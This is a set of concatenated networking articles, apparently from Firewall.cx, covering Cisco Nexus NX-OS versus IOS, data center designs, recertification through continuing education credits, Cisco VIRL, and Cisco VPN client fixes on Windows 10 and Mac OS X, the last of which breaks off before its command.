The NX-OS architecture can perform three different main functions of a Data Center by being able to process Layer 2, Layer 3, and storage protocols. Each service (feature) in NX-OS runs as a separate independent protected process. In particular, each non-kernel process runs in its own protected memory space, providing fault tolerance while isolating any issues that arise with that process. For instance, if a Layer 2 service such as RSTP (Rapid Spanning-Tree Protocol) fails, it will not affect any other services running at that time such as the Layer 3 EIGRP service. In addition, NX-OS is based on the Linux kernel taking advantage of the characteristics offered by the most reliable OS.

Most NX-OS features are not enabled by default in order to achieve optimal processing and memory utilization, so if a technology like UDLD needs to be deployed, the feature must be enabled manually. It should be mentioned that NX-OS offers feature testing for a 120-day grace period; using the grace period enables customers to test a feature prior to purchasing a license.
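
As a minimal illustration (UDLD is chosen purely as an example and the output is abbreviated), a feature is switched on with the feature command and its status verified with show feature:

N5K (config)# feature udld
N5K (config)# show feature | include udld
udld                  1          enabled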

A network engineer who is familiar with the traditional Cisco IOS command-line interface (CLI) will not face difficulties in using the NX-OS CLI for basic operations. The official Cisco tool, Cisco IOS to NX-OS Configuration Converter (requires a Cisco CCO account), can be helpful for translating between Cisco IOS and NX-OS. This online tool is free and supports Catalyst 4900-6500 IOS configurations, which can be translated to NX-OS configuration for the Nexus 3000, Nexus 5000, Nexus 6000, Nexus 7000 and Nexus 9000 series.

Nexus NX-OS – Catalyst IOS Key Differences

There are key differences that should be understood prior to getting involved with the Cisco Nexus Operating System (NX-OS), these are highlighted below:

  • NX-OS uses a feature-based license model. Features such as Unidirectional Link Detection (UDLD) and Fibre Channel over Ethernet (FCoE) can be enabled via the feature configuration command. Configuration and verification commands for a specific feature are not available until that feature has been enabled.
  • NX-OS supports VDCs for Nexus 7000 platforms, which enables a physical device to be partitioned into logical devices. The default VDC is used when you log in for the first time.
  • By default, Secure Shell version 2 (SSHv2) is enabled and Telnet is disabled.
  • The default login administrator user is admin. It is no longer possible to login with just a password.
  • NX-OS uses a kickstart image and a system image. The kickstart image provides the Linux kernel and the system image provides the Layer 2/3 functionalities and features such as OTV, DHCP etc.
  • NX-OS supports Checkpoint & Rollback feature that allows the creation of configuration snapshots with the ability to rollback changes at any point without interrupting system functionality.
  • All Ethernet interfaces are called Ethernet. The FastEthernet, GigabitEthernet, TenGigabitEthernet interface naming conventions no longer exist.
  • The EtherChannel (IOS) naming convention has been replaced by Port-Channel (NX-OS).
  • The write memory command is no longer available and has been replaced by copy running-config startup-config.
  • Show commands can be executed identically from both exec and config mode, e.g.:
N7K (config)# show version
  • Show commands have parser help even in configuration mode.
  • Slash (forward-slash) notation is supported for all IPv4/IPv6 masks. For instance:
N5K (config)# int e1/1  
N5K (config-if)# ip address 10.1.1.1/24
N5K (config-if)# ipv6 address ::1/120
  • Two configuration models exist for the routing protocols (a brief sketch follows this list):

       - IGPs follow interface-centric model

       - BGP follows neighbor-centric model
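
To illustrate the two models, a minimal hedged sketch is shown below (the process tag, AS numbers and addresses are hypothetical): an IGP such as OSPF is attached to each interface, while BGP configuration is organised per neighbor:

N5K (config)# feature ospf
N5K (config)# router ospf 1
N5K (config)# interface Ethernet1/1
N5K (config-if)# ip router ospf 1 area 0.0.0.0

N5K (config)# feature bgp
N5K (config)# router bgp 65001
N5K (config-router)# neighbor 10.1.1.2 remote-as 65002
N5K (config-router-neighbor)# address-family ipv4 unicast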

In any case, the NX-OS cli alias command syntax can be used to create a shortcut. For instance, to use the IOS write command on NX-OS to save the running configuration, the following alias can be used:

N5K (config)# cli alias name write copy running-config startup-config

With this alias in place, executing the write command will run copy running-config startup-config.

High-End Switches: Nexus vs Catalyst

The Nexus product family is tailored mainly for Data Center environments and offers the following advantages over Catalyst Core switches:

  • Interfaces: Only the Nexus 7000 series has 100GbE line cards available. Catalyst 6500 & 6800 Core switches offer interfaces up to 40GbE.
  • Capacity: Nexus 7000 series (Nexus 7700) has a maximum system capacity ~42Tbps and the Nexus 9000 (9500 model) 60Tbps. In contrast, the maximum system capacity of the Catalyst 6800 is much lower ~6Tbps.
  • Port Scalability: The Nexus family is much more scalable than the Catalyst 6500/6800 regarding maximum port density of 1G, 10G & 40G ports.
  • High Availability (HA): Nexus products can utilize vPC technology, which is one of the most commonly used Nexus HA features and is similar to the Catalyst VSS mode. It is used to provide multi-chassis link aggregation. The key difference is that vPC does not rely on a unified control plane like the VSS setup, so both Nexus switches operate independently.
  • The Nexus 7000 VDC feature offers the capability to partition the Nexus switch into multiple independent logical switches. VDCs cannot communicate with each other, other than by physically connecting a port in one VDC to a port in another VDC. A maximum of four VDCs is supported on a Supervisor 1 (SUP1) or Supervisor 2 (SUP2) based system, and up to eight on a Supervisor 2 Enhanced (SUP2E) based system. The VDC feature implements a separate control plane for each context and offers the advantage of consolidating several physical network devices.
  • The Nexus 5000, 7000 and 9000 series support the use of the Nexus 2000 Series Fabric Extenders to further expand the system and provide a large-scale virtual chassis in the data center. This unique feature of the Nexus switches can greatly simplify the management and operation of a data center network.
  • The Nexus 7000 series supports several DC interconnection technologies which are not available on the Catalyst 6500/6800 core switches. In particular, the Nexus 7000 Series supports the well-established OTV, VXLAN and FabricPath technologies.
  • The NX-OS is a much more robust operating system than IOS, built with modularity, resilience and serviceability as its foundation.
  • The Nexus 7000 and 5000 series switches can implement a converged LAN/SAN network setup by supporting storage protocols (FC/FCoE), which are not supported by the Catalyst 6500/6800 switches.
  • The Nexus switches cannot accept service module line cards such as the Firewall (FWSM) or Wireless (WiSM) service modules, unlike the Catalyst 6500/6800 switches.
  • Finally, the Nexus switches do not support the NAT feature, in contrast to the Catalyst 6500/6800.

Nexus Basic Design Aspects – Where The Nexus and MDS Switches Fit In a Data Center

This section identifies the typical placement of the Cisco Nexus and MDS Families series switches in a Cisco Data Center.

Single-Tier Nexus Data Center Design

The Cisco Nexus 7000 Series can be used for both access and core layer connectivity in the single-tier data center architecture. The access layer connectivity for the servers can be provided with low cost 48-port Gigabit Ethernet linecards or with the 32-port 10 Gigabit Ethernet linecards if 10GE interfaces are required.

Single-Tier Nexus Data Center Topology

The single-tier data center architecture (shown above) can be expanded by connecting Cisco Nexus 2000 fabric extenders to the Cisco Nexus 7000 Series switches to provide connectivity for the servers. It should be mentioned that the Nexus 2000 can only be used to provide connectivity to servers or end hosts and should not be connected to other switches. This setup provides a Top-of-Rack (ToR) solution for the servers, with a Cisco Nexus 7000 Series switch acting as the management point and collapsing the access, aggregation and core layers. It should be highlighted that if the budget is limited, the Nexus 9000 is the best alternative to the Nexus 7000. A pair of Nexus 5000 switches in a single-tier setup is a common low-cost solution for small data centers.

Two-Tier Nexus Data Center Design

The two-tier data center option connects the Cisco Nexus 2000 Fabric Extenders to an upstream Cisco Nexus 5000 Series switch. The Cisco Nexus 5000 functions as an End-of-Row (EoR) access switch and is connected via multiple links to a pair of Cisco Nexus 7000 switches. This topology provides an access layer and a collapsed core and aggregation layer.

Two-Tier Nexus Data Center Topology

Three-Tier Nexus Data Center Design

The three-tier data center is similar to the two-tier architecture regarding the access layer and the placement of the Nexus 5000 and Nexus 2000 switches. However, multiple Nexus 7000 switches are used at the aggregation layer, and the core layer is provided by a pair of Cisco Nexus 7000 Series switches:

Three-Tier Nexus Data Center Topology

The Nexus 9000 switches, thanks to their exceptional performance and comprehensive feature set, are versatile platforms that can be deployed in multiple scenarios such as layered access-aggregation-core designs, leaf-and-spine architectures and compact aggregation-layer solutions.

The Cisco MDS 9000 Series Multilayer Switches can provide the SAN connectivity at the access layer and the storage core layer. Connectivity between the SAN and LAN infrastructures to support FCoE would be provided through the Cisco Nexus 7000 or 5000 series switches and the Cisco MDS 9000 Series core layer.

Summary

This article introduced the Cisco Nexus product family. We explained how the Nexus platform differs from the well-known Catalyst switches and examined key differences between the two platforms and operating systems (NX-OS – IOS). We analyzed each Nexus series, including the well-known MDS 9000, and showed how Single-Tier, Two-Tier and Three-Tier data center topologies make use of the Nexus platform. For more information including technical articles visit our Cisco Data Center section.

Cisco's First Official Australian User Group

Join Australia’s First Official Cisco Data Center User Group (DCUG) & Become Part of a Friendly Fast-Growing Professional Community That Meets Once a Month in Melbourne!

It’s a reality – Australia now has its own Official Cisco Data Center User Group (DCUG) and it’s growing fast! Originally inspired by Cisco Champions Chris Partsenidis and Derek Hennessy, the idea was fully backed by Cisco Systems, as they happened to be looking to start something similar on a global scale.

The idea was born in the morning hours of the 18th of March 2016 over a hot cup of coffee, when Chris Partsenidis and Derek Hennessy met for the first time after Cisco Live! in Melbourne, Australia. Both Chris and Derek agreed that it was time to create a friendly professional Cisco community group that would gather Cisco professionals and encourage users to share knowledge and experience.

The proposal was sent to Lauren Friedman at Cisco Systems, who just happened to be working on a similar concept on a global scale. Lauren loved the idea and, with her help, Australia got its first official Cisco Data Center User Group!

Becoming part of the Melbourne Cisco Data Center User Group is absolutely free and, by joining, you’ll be part of Australia’s first official Cisco user group, which is currently the largest in the world!

Where are the Meetings Held and What’s Included?

The user group will catch up on the first Tuesday of every month at The Crafty Squire at 127 Russell Street in Melbourne CBD. We’ll be located upstairs in Porter Place. Our first meeting will be on Tuesday June 7th 2016 and all meetings will take place between 17:30 and 19:30.

For the duration of the meeting, we’ll have free beer and food for all registered members and, if we are lucky, free Cisco beer mugs! The mugs are actually on their way from the USA and we are hoping to have them in time for the meeting; otherwise we’ll be handing them out during the following meeting.

official-cisco-data-center-user-group-melbourne-australia-2

Figure 1. The Porter Place - Crafty Squire

For more details about our regular meetups and to join our community, head over to the Cisco Data Center User Group page on Meetup.com.

We're really excited to start building a Data Center community in Melbourne so come along and join us!

Agenda – 7th of June 2016

Vendor Session: Infrastructure as Code and DevOps

Speaker: Chris Gascoigne - Technical Solutions Architect, Cisco Systems Melbourne, Australia

Chris Gascoigne is a Technical Solutions Architect with Cisco Systems working in the Australia/New Zealand Data Centre team. Chris has been with Cisco for nine years and specialises in Application Centric Infrastructure.

Community Session: GNS3 Connectivity

Speaker: Will Robinson - Senior Systems Engineer

Will Robinson is a Senior Systems Engineer and has extensive networking and data center experience. Will is an active community member and is the only Australian member of the NetApp A-Team group.


Renewing Cisco Certifications without sitting for a Cisco Exam. Covers CCNA, CCNP, CCIE, CCDE and all Specialist Levels

cisco recertification

Without a doubt, Cisco certifications and specializations are among the most popular vendor certifications in the IT industry, and earning them doesn’t come easy. Anyone who’s achieved a Cisco certification would be well aware of the countless hours required to cover the necessary curriculum, complete practice labs and prepare for their Cisco exam.

Many would agree that one of the biggest headaches after achieving a Cisco certification is renewing it. Renewing or maintaining a Cisco certification usually requires the candidate to sit for an equal-level exam or to push forward and aim for a higher-level exam. While this might not be a problem for some professionals, many find it a big struggle, and a significant number of professionals decide not to renew their certifications because of the time and commitment required or because they’ve decided to focus on other vendors.

In this article, you’ll discover how you can easily renew any Cisco certification or specialization without sitting for a single exam! We’ll explain the different recertification paths, show how to select a recertification path, submit a claim, track the recertification process, open a support ticket, and more!


Recertifying Cisco Certifications without Exams – How it Works

It is indeed possible to renew any Cisco certification without sitting for the dreaded exams. The mechanism is called the Cisco Continuing Education Program, and we’ll explain how it works.

The Cisco Continuing Education Program allows Cisco certified engineers to earn Continuing Education (CE) credits that are then applied towards recertification. CE credits can be earned via the following activities:

  • Instructor-Led Training
  • Cisco Digital Learning
  • Cisco Live! Training Sessions (BRK, LTR, TEC, DEVWks)
  • Cisco Network Academy Training
  • Other Activities such as workshops, bootcamps, etc

The amount of CE credits earned depends on the type of activity and its duration. For example, you can earn 12 CE credits for sitting through a 14-hour Cisco course delivered via the Cisco Digital Learning platform, or a generous 40 to 65 credits for attending a 5-day Cisco Instructor-Led training course offered by authorized Cisco Learning Training Partners.

Once the training course or activity is complete, you submit a claim to earn the CE Credits. When you’ve gathered enough CE credits, you are automatically recertified.

How Many Continuing Education Credits Do I Need?

The number of Continuing Education credits required for your certification renewal depends on the level of recertification. For example, Associate-level recertification, such as the CCNA, requires a minimum of 30 CE credits. In contrast, the Professional level (CCNP Enterprise, CCNP Data Center, etc.) requires 80 CE credits and the CCIE level an impressive 120 Continuing Education credits.

The table below shows all available certification levels, their duration and the required Continuing Education credits, as well as the option to combine exams with Continuing Education credits to achieve recertification:

cisco recertification requirements

Recertification requirements must be met prior to the certification expiration date.

Combining Continuing Education credits and exams provides significant flexibility, as it allows engineers to maximize their options and achieve recertification more easily and with less stress.

Planning Your Cisco Recertification Strategy - Selecting a Course or Activity

When planning your recertification path, it’s crucial to have a strategy to help you achieve your goal the fastest way; therefore, understanding how to search and browse through Cisco’s list of activities is very important.

You can browse through Cisco’s lists of activities by visiting the Cisco Continuing Education Program website and selecting Item Catalog from the menu as shown below:

cisco continuing education program selecting an activity

From here, you can search for a course name and use the various filters to find a suitable course. An easy way to look at your available options is to select the Category and Type of training, then click on Search to list all available training for the selected filters.

We’ve selected CCNP/CCDP Training (1) and Instructor-Led training (2) in the example below. This returned several different courses, delivery methods (Item type), and credits each course earns:

cisco continuing education program searching for an activity

By clicking on the View Details link on the right, we can obtain additional information about the course, where and when it’s delivered, and further filter our selection based on time-zone, dates, and more. Spending 15 minutes browsing through the Item Catalog list and using the various filters helps you better understand how to search for the course or activity that best suits you.

Claiming Cisco Education Credits

After selecting and completing an activity, you must register or claim the activity so that the Educational Credits are awarded to your account.

You must register/claim your activity within 90 days of completing it, or else you miss the opportunity to claim the credits.

To help illustrate how to claim your Educational Credits, we’ll use a real example below. In this case, the candidate has attended two Instructor-Led courses delivered by an authorized Cisco Training partner:

Course 1: Implementing and Configuring Cisco Identity Services Engine (SISE) 3.0, 40 Credits - Claimed

Course 2: Implementing and Operating Cisco Security Core Technologies (SCOR) 1.0, 64 Credits - Unclaimed

Note: We’ll cover below the complete process of claiming credits using Course 2 as an example.

Upon logging into Cisco’s Continuing Education Program website, the dashboard displays the first course (SISE 3.0), which was completed and successfully claimed, providing a total of 40 Credits:

cisco continuing education program my dashboard

Now it’s time to claim the second course, SCOR (1.0).

To begin, click on the Submit Items menu and enter the course details. When ready, click the Submit button:

cisco continuing education program submit items

The Cisco course attended was Implementing and Operating Cisco Security Core Technologies (SCOR) 1.0, delivered via Instructor Led Training method by an authorized Cisco Training partner.

As soon as the course details are submitted, a confirmation window appears. Double-check all details and click on Yes to submit the item:

cisco continuing education program submit items confirm

After a few minutes, we received an email confirmation containing the item and details that were submitted:

cisco continuing education program submit email confirmation

Viewing the main dashboard on the Cisco Continuing Education site, you’ll notice the newly submitted item is listed and in a Pending state. The course is eligible for 64 credits:

cisco continuing education program submitted item pending

Cisco next reaches out to the provider to verify the claim. Once this process is complete, Cisco approves the claim, credits are added to the account, and an email confirmation is sent informing us of the outcome:

cisco continuing education program email credit approval

The time required to process a claim is usually fast – one to two business days. However, if no response is received or the outcome is not the desired one, it is highly advisable to open a case using the Help menu item on the top right corner of the page:

cisco continuing education program open a support case

Certmetrics: Tracking – Verifying the Recertification Progress

Certmetrics helps Cisco professionals keep track of their certification progress, testing history and transcripts, download digital badges, and more. The site is accessible at the following URL: https://www.certmetrics.com/cisco/, and a link is also available from the main dashboard within the Cisco Continuing Education site.

Under the Certifications menu option, you’ll find all active and expired certifications. Select the certification for which you are recertifying; this is usually the highest certification, as it automatically renews all others below it. In this example, we selected (clicked) the CCNP Enterprise:

certmetrics certification status before second course approval

The next window shows all paths for the CCNP Enterprise recertification. This maps to the recertification path options shown at the beginning of the article. 

Option 1: Satisfy one of the listed items between 1.1.1 – 1.1.2 or two items under 1.1.3.

Option 2: Satisfy one item under 1.2.1 and 1.2.2 (40 CE credits).

Option 3: Satisfy one item under 1.3 (80 CE credits).

ccnp enterprise progress report

Our preferred recertification path is 1.3. This requires 80 CE credits, of which 40 have already been claimed and awarded from the first course.

The above screenshot was taken after the 40 credit points from the first course were approved.

After the second item (course) has been approved, menu item 1.3 will be fully satisfied and show a total of 80 CE Credits (80/80).

Cisco Associate, Professional and Specialist Certs Successfully Renewed!

The below screenshot confirms that both Instructor Led Training courses were approved, earning us a total of 104 CE credits. We were able to successfully renew all Cisco certifications:

successfully recertified all cisco certifications final

We should note that the certifications above set to expire in 2 and 69 days have been retired by Cisco and therefore cannot be renewed.

Summary

In this article we showed how it’s possible to recertify/renew your Cisco certifications without sitting for any Cisco exams. We explained how the recertification process works via the Continuing Education Program, how to earn Continuing Education (CE) credits, calculate the credits required to recertify, search for and claim your credits, track your recertification progress and more.


Introduction to Cisco VIRL – Virtual Internet Routing Lab & Other Simulation Tools

Cisco VIRL – Virtual Internet Routing Lab

One of the most difficult things for people who are starting out in a networking career is getting their hands on the equipment. Whether you are studying for a Cisco certification or just want to test certain network behaviors in a lab, no one would dispute that practicing is the best way to learn.

I have seen people spend hundreds or thousands of dollars (myself included) buying used networking equipment in order to build a home Cisco lab, gain practical experience and study for certification exams. Until a few years ago this was the only option available, unless you rented lab hours through one of the training companies.

Other Simulation Tools

GNS3 is a well-known free network simulation platform that has been around for many years. Cisco IOS on UNIX (IOU) is another option for running Cisco routers in a virtual environment. It is a fully working version of IOS that runs as a user-mode UNIX (Solaris) process. IOU was built as a native Solaris image and runs just like any other program. One key advantage of Cisco IOU is that it does not require nearly as many resources as GNS3 and VIRL do. However, the legality of the source of Cisco images for GNS3 is questionable.

Cisco VIRL Network Topology

Figure 1. Cisco VIRL Network Topology (click to enlarge)

If you are not an authorized Cisco employee or trusted partner, usage of Cisco IOU is potentially a legal gray area. Because of the lack of publicity and availability to average certification students and network engineers, online resources are limited and setting up a network takes much more effort. Also, due to missing features and delays in supporting recent Cisco image releases, Cisco does not recommend these tools to engineers and students.

Read our review on "The VIRL Book" – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

Here Comes Cisco VIRL

Cisco Virtual Internet Routing Lab (VIRL) is a software tool Cisco developed to build and run network simulations without the need for physical hardware.

Under the hood, VIRL is an OpenStack-based platform that runs IOSv, IOSvL2, IOS XRv, NX-OSv, CSR1000v, and ASAv software images on the built-in hypervisor. VIRL provides a scalable, extensible network design and simulation environment using the VM Maestro frontend. Recently, I have seen extensive development and improvement made on the browser-based operations using HTML5. VIRL also has an extensive ability to integrate with third-party vendor virtual machines such as Juniper, Palo Alto Networks, Fortinet, F5 BigIP, Extreme Networks, Arista, Alcatel, Citrix and more.

VIRL comes in two different editions: Personal Edition and Academic Edition. Both have the same features, except the Academic Edition is cheaper. At the time of writing, the Academic Edition costs $79.99 USD per year and the Personal Edition costs $199.99 USD per year. VIRL's license limits simulations to 20 Cisco nodes at a time; you can pay an extra $100 USD to upgrade to a maximum of 30 Cisco nodes. To qualify for the Academic Edition, you must be faculty, staff or a student of a public or private K-12 institution or Higher Education institution.

Cisco VIRL is community-supported and is designed for individual users. For enterprise users who want TAC support, in-depth documentation, training and more, there is Cisco Modeling Labs (CML), an enterprise version of VIRL. Of course the CML version costs much more.

Why VIRL Is Better

Official Cisco Images

VIRL comes with a complete set of legal and licensed Cisco IOS images that are the same as those running on physical routers (I’m sure they were tweaked to optimize them for running in a virtual environment). New Cisco IOS releases are provided on a regular basis.

Runs on Most Computers

The minimum hardware requirement for VIRL is an Intel-based computer with four CPU cores, 8GB of RAM and 70 GB free disk space. Of course more resources allow for larger simulations. Cisco suggests larger memory, such as 12GB for 20 nodes, 15GB for 30 nodes, or 18GB for 40 nodes. Each Cisco IOS-XRv node requires 3GB of memory to launch. In my experience, the only thing that is likely to stop you is the amount of memory installed on the computer. Computer memory is now inexpensive. You just need to ensure that your computer has enough empty slots to install additional memory.

Flexible Installation Options

You can install VIRL on enterprise-grade server infrastructure, a desktop computer, a laptop, or even in the cloud. You can run it as a virtual machine on VMware ESXi, VMware Workstation, VMware Player or VMware Fusion for Mac OS. As opposed to running it on a hypervisor, some choose to build VIRL on a bare-metal computer to achieve maximum performance.

Once your VIRL lab is up and running, it is an all-in-one virtual networking lab that has no wires and cords attached. When you run it as a VM, you can scale, migrate and implement high availability (HA) by taking advantage of the features that VMware infrastructure has to offer.

Automatic Configuration

AutoNetkit, which comes with VIRL, can assign IP addresses to the nodes automatically when they launch, and it will even set up some basic routing protocols for you. The bootstrap configuration gives you a fully converged network as soon as the nodes are launched, so you can go straight to the features you want to test. This is a great feature for network engineers who want to set up a one-time temporary environment to look up commands and test certain features. If you are building a network topology from scratch, or creating a mockup of a production environment, manual IP addressing is recommended.

Community Support by Developers

VIRL is supported by a community full of good people like you. Questions are often answered first-hand by developers and engineers. The Cisco VIRL team offers monthly webinars and newsletters to keep the community updated on new feature releases and announcements. You can find the online community on Cisco Learning Network at: https://learningnetwork.cisco.com/groups/virl

About The Author

Jack Wang, CCIE #32450, is a principal network consultant and founder of Speak Network Solutions. He has been designing and implementing enterprise and large-scale service provider networks as well as teaching and blogging about advanced technologies. His current focus includes Software Defined Networking (SDN), data centers, Amazon AWS cloud integration, wireless, and WAN architectures and design. Jack holds a B.S. in Engineering and an M.S. in Computer Science.

Summary

I wish VIRL had been available when I first started learning Cisco networking technology and taking CCIE exams. I have used GNS3, IOU and other simulation and emulation tools. They all had their advantages and disadvantages. When looking at them together, there are four main reasons I recommend VIRL to network engineers, certification students and trainers.

  • Developed by Cisco, running official Cisco images. No concerns about legal or software licensing issues.
  • Has a production-grade, commercial version (CML - Cisco Modeling Lab) available to enterprise customers. It runs essentially the same code as VIRL. Cisco has made VIRL much more affordable for personal and academic use, without the price tag and TAC support. Why not take advantage of it?
  • Runs on OpenStack and is SDN-ready. If you are interested in learning about Software Defined Networking, VIRL has direct integration with OpenDaylight.
  • Is actively developed by Cisco. New features and updates are released regularly.

Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607 – 'This App Can’t Run on This PC'

Windows 10's latest update, 1607, code-named the Anniversary Update, promises to introduce a number of significant enhancements, including breaking your trustworthy Cisco IPSec VPN client. After installing the Anniversary Update, users will receive a familiar message from the Compatibility Assistant:

This app can’t run on this PC. Cisco VPN Client doesn’t work on this version of Windows

Figure 1. This app can’t run on this PC. Cisco VPN Client doesn’t work on this version of Windows

The good news is that the message isn't entirely accurate. While Windows 10 does in fact disable the application, getting it to work again is a very easy process, very similar to installing the client on the Windows 10 operating system.

The following steps will help rectify the problem and have your Cisco IPSec VPN client working in less than 5 minutes.

Windows 7 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 7 Operating System.

Windows 8 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 8 Operating System.

Windows 10 Anniversary users without the Cisco VPN Client should read our article How to Install and Fix Cisco VPN Client on Windows 10.

Step 1 – Download and Extract the Cisco VPN Client

Head to the Firewall.cx Cisco Tools & Applications download section to download and extract the Cisco IPSec VPN Client installation files on your computer. The Cisco VPN installation files will be required for the repair process that follows.

Note: The Cisco IPSec VPN Client is offered in a 32Bit and 64Bit version. Ensure you download the correct version for your operating system.

Step 2 – Repair The Cisco VPN Client Application

After the file extraction process is complete, go to the Windows Control Panel and select Programs and Features. Locate the Cisco Systems VPN Client, select it and click on Repair:

Initiating the Repair of the Cisco IPSec VPN Client

Figure 2. Initiating the Repair of the Cisco IPSec VPN Client

The repair process will ask for the location of the Cisco VPN installation files – simply point it to where the files were extracted previously, e.g. c:\temp\vpnclient.

At this point the Windows 10 User Account Control will prompt for confirmation to allow the Cisco VPN application to make changes to your device. Click Yes to continue:

Windows 10 User Account Control requesting user confirmation to make changes

Figure 3. Windows 10 User Account Control requesting user confirmation to make changes

The repair process will continue by reinstalling the Cisco VPN client files as shown in the process below:

The repair process of the Cisco VPN Client on Windows 10 Anniversary update

Figure 4. The repair process of the Cisco VPN Client on Windows 10 Anniversary update

Step 3 – Edit Windows Registry - Fix Reason 442: Failed To Enable Virtual Adapter Error

At this point, the workstation has a fresh installation of the Cisco VPN Client, but will fail to work and produce the well-known Reason 442: Failed to enable Virtual Adapter Error.

To fix this issue, follow the steps below:

1. Open your Windows Registry Editor by typing regedit in the Search Windows area.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Modify & correct the Windows 10 Cisco VPN Registry entry

Figure 5. Modify & correct the Windows 10 Cisco VPN Registry entry

For Windows 10 32bit (x86) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter” to “Cisco Systems VPN Adapter”.

For Windows 10 64bit (x64) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows” to “Cisco Systems VPN Adapter for 64-bit Windows” as shown below:

Editing the Value Data for the 64Bit Cisco VPN Client

Figure 6. Editing the Value Data for the 64Bit Cisco VPN Client

The registry key now shows the correct DisplayName value data:

The correct DisplayName registry value for the 64bit Cisco VPN Client

Figure 7. The correct DisplayName registry value for the 64bit Cisco VPN Client
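For readers who prefer the command line, the same registry change can be applied with the built-in reg utility from an elevated Command Prompt. The example below is a sketch for the 64-bit value; on 32-bit systems the value data is simply "Cisco Systems VPN Adapter", exactly as described above:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\CVirtA" /v DisplayName /t REG_SZ /d "Cisco Systems VPN Adapter for 64-bit Windows" /f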

At this point, you should be able to connect to your VPN Gateway without any errors or problems.


Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter

Fix Windows 10 Reason 442: Failed to enable Virtual Adapter

This article shows how to correctly install the Cisco VPN Client (32 & 64 bit) on Windows 10 (32 & 64 bit) using simple steps, overcome the ‘This app can’t run on this PC’ installation error, plus fix the Reason 442: Failed to enable Virtual Adapter error message. The article applies to new Windows 10 installations or upgrades from earlier Windows versions, and to all versions before or after Windows 10 build 1511. We also include all required VPN files, directly downloadable from Firewall.cx, to save time and trouble from broken 3rd-party links.

To simplify the article and help users quickly find what they are after, we’ve broken it into the following two sections:

  • How to Install Cisco VPN client on Windows 10 (clean installation or upgrade from previous Windows), including Windows 10 build prior or after build 1511.
  • How to Fix Reason 442: Failed to enable Virtual Adapter on Windows 10

The Cisco VPN Client Reason 442: Failed to enable Virtual Adapter error on Windows 10

Figure 1. The Cisco VPN Client Reason 442: Failed to enable Virtual Adapter error on Windows 10

Windows 7 32bit & 64bit users can read our Cisco VPN Client Fix for Windows 7 Operating System.

Windows 8 users can read our Cisco VPN Client Fix for Windows 8 Operating System.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.

How To Install Cisco VPN Client On Windows 10 (New installations or O/S Upgrades)

The instructions below are for new or clean Windows 10 installations. Users who just upgraded to Windows 10 from an earlier Windows version will need to first uninstall their SonicWALL VPN Client & Cisco VPN client, then proceed with the instructions below.

  1. Download and install the SonicWALL Global VPN Client from Firewall.cx’s Cisco Tools & Applications section. This is required so that the DNE Lightweight filter network client is installed on your workstation. You can remove the SonicWALL Global VPN Client later on.
  2. Download and install the Cisco VPN client (32 or 64 bit) from Firewall.cx’s Cisco Tools & Applications section.
  3. Optional: Uninstall the SonicWALL Global VPN Client.

Note: If you receive the Windows message “This app can’t run on this PC”, go to the folder where the Cisco VPN client was extracted and run the “vpnclient_setup.msi” file. If you don’t remember where the file was extracted, execute the downloaded file again and select an extraction path, e.g. c:\temp\ciscovpn\, so you know where to look for it.

Overcoming the “Cisco VPN Client doesn’t work on this version of Windows” message

Figure 2. Overcoming the “Cisco VPN Client doesn’t work on this version of Windows” message
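As an alternative to double-clicking the file, the installer can also be launched from a Command Prompt. A minimal sketch, assuming the files were extracted to c:\temp\ciscovpn as in the example above:

msiexec /i c:\temp\ciscovpn\vpnclient_setup.msi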

After successfully installing the Cisco VPN Client, you can uninstall the SonicWALL Global VPN Client to save system resources and stop it from running in the future; however, ensure you leave all uninstall options at their defaults. This means leaving the two options below unchecked during the uninstall process:

Uninstalling the SonicWALL Global VPN Client after Cisco VPN Client installation

Figure 3. Uninstalling the SonicWALL Global VPN Client after Cisco VPN Client installation


This completes the installation phase of the Cisco VPN client on Windows 10.

How To Fix Reason 442: Failed To Enable Virtual Adapter On Windows 10

When attempting to connect to a VPN gateway (router or firewall) using the Cisco VPN Client on Windows 10, the connection will fail with the following error: Reason 442: Failed to Enable Virtual Adapter.

This fix is very easy and identical to the Windows 8 Cisco VPN Client fix already covered on Firewall.cx:

1. Open your Windows Registry Editor by typing regedit in the Search the web and Windows prompt.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Modify & correct the Windows 10 Cisco VPN Registry entry

Figure 4. Modify & correct the Windows 10 Cisco VPN Registry entry

For Windows 10 32bit (x86) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter” to “Cisco Systems VPN Adapter”.

For Windows 10 64bit (x64) operating systems, change the value data from “@oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows” to “Cisco Systems VPN Adapter for 64-bit Windows” (shown below):

Editing the Value Data for the Cisco VPN Client

Figure 5. Editing the Value Data for the Cisco VPN Client

The registry key now shows the correct DisplayName value data:

The correct 64bit Windows 10 registry values for the Cisco VPN Client to work

Figure 6. The correct 64bit Windows 10 registry values for the Cisco VPN Client to work

At this point, you should be able to connect to your VPN Router or Gateway without any problems.


How to Fix Cisco VPN Client Error 51 – Unable to Communicate with the VPN Subsystem

Apple Mac OS X users are frequently faced with the Cisco VPN Client Error 51 - Unable to Communicate with the VPN Subsystem as shown in the screenshot below:

cisco-vpn-mac-error-51-1

When this error is produced, users will no longer be able to connect to their VPN using the Cisco VPN client. It seems like Cisco’s VPN client often produces the error when network adaptors disappear and reappear – a common scenario when removing the Ethernet cable or reconnecting to your wireless network.

The solution provided will force the Cisco VPN to re-initialize and continue working without a problem.

To overcome the error, close the VPN Client, open a Terminal Window, (Applications -> Utilities -> Terminal) and type one of the following commands:

For older OS versions:

